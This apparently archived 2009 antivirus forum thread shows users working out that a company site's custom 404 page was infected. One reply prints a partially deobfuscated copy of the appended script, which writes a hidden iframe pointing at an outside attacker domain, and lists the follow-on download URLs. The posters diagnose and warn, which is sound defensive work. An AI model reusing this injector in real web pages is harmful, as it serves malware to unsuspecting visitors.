Author Topic: JS:Packed-AB [Trj] was found while trying to open .jpg picture  (Read 3447 times)


fokel

  • Guest
JS:Packed-AB [Trj] was found while trying to open .jpg picture
« on: February 12, 2009, 05:46:31 PM »
Hello,

Can there really be a virus in a .jpg file?
I visited a normal site (just a chocolate producing company, no porn, no warez), and while trying to open a picture, avast! informed me of the JS:Packed-AB [trj] virus inside of it and terminated the connection.

I wrote a letter to the site owner, telling them about the issue, but they replied that they scanned all the files and did not find any threat. They said that my antivirus wrongly thought that "some of their java applets were virus".

Today I visited that site again, and again there was a virus in it.

In fact it is not my problem, but I do not want other people to suffer if there is a virus indeed. Can anybody check whether this is a real virus or a false alarm? I want to convince the site owner that they have a virus, but I am not sure how else I can prove it to them.

virus is reported to be in this file:

WARNING!
do not visit this link if you do not have antivirus!

h t t p: // w w w . s p a r t a k . by/img/product/b/429b.jpg

(remove empty spaces when entering it)

solcroft

  • Guest
Re: JS:Packed-AB [Trj] was found while trying to open .jpg picture
« Reply #1 on: February 12, 2009, 06:09:44 PM »
Thanks for the address - just grabbed what looks like a Zlob downloader off it.

i.e.: yes, the site is infected...

solcroft

  • Guest
Re: JS:Packed-AB [Trj] was found while trying to open .jpg picture
« Reply #2 on: February 12, 2009, 06:50:49 PM »
From what I can tell, the URL you provided doesn't exist and leads to a customized 404 error page. It's the 404 page itself that is infected with a script appended to the end of its code.

Partial deobfuscation:
Quote
function HCYFL(){};
HCYFL.prototype = {
  // marks the visitor so the frame is written only once per day
  setCookie : function(name, value){
    var d= new Date();
    d.setTime(new Date().getTime() + 86400000);
    document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString();
  },
  alreadyInstalled : function(){
    return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
  },
  // junk characters are stripped at run time; the alphabet left over is 0-9a-f
  getRandString : function(){
    var l=16,c='0m1o2L3m4m5L6v7v8L9mambmcodmemfv'.replace(/[m\)voL]/g, ''),o='';
    for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);
    return o;
  },
  cookieName:'aehdcbgf',
  host:'axa3.cn',
  // builds <visited host>.<random hex>.axa3.cn/elanguage.cn/ as the frame target
  getFrameURL : function(){
    var dlh=document.location.host;
    return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;
  },
  cookieValue:1,
  path:'/elanguage.cn/',
  // the two padded strings decode to a hidden <div> wrapping an <iframe>
  install : function(){
    if(!this.alreadyInstalled()){
      var s="<Yd$iYv5 PsPtPy$lYeP=b\'5d5iPsPp5l5a$yY:Pn$oYnYeY\'b>P<$i5f$r$aPm5eb YsPr5cb=$\'P".replace(/[5YP\$b]/g, '')+this.getFrameURL()+"\'O>O<{/Pi1f1rPa6mPe1>O<P/PdOi6vO>6".replace(/[\{16OP]/g, '');
      try {
        var o=document;o.open();o.write(s);o.close();
      }catch(e){
        document.write('<3h!t!m,l.>,<fb3o3d!y!>f'.replace(/[\!3f,\.]/g, '')+s+'<e/ebeofdGyz>f<A/fhGtzmfle>G'.replace(/[zGfAe]/g, ''))
      }
      this.setCookie(this.cookieName, this.cookieValue);
    }
  }
};
var ocho=new HCYFL();
ocho.install();

Eventually leads to hxxp://www.microsoft.com.v6.update.js.status200.londoncn.cn/ebay.cn/index.php, and then hxxp://www.microsoft.com.v6.update.js.status200.londoncn.cn/ebay.cn/forum.php. forum.php is actually a binary file.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
Re: JS:Packed-AB [Trj] was found while trying to open .jpg picture
« Reply #3 on: February 12, 2009, 08:28:14 PM »
I have seen this sneaky hacking of a customised 404 page once before on the forums; it looks like a newly developing attack vector.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.5.6116 (build 24.5.9153.762) UI 1.0.808/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

fokel

  • Guest
Re: JS:Packed-AB [Trj] was found while trying to open .jpg picture
« Reply #4 on: February 12, 2009, 09:55:17 PM »
solcroft, thank you for reply!

Even though the description and javascript code are beyond my understanding, the main info I got from your post was that the site was really infected.

I sent a new letter to the site owner, and I hope that they will take some measures... Though there is no response till now. I am afraid that they do not care or do not take it seriously, alas.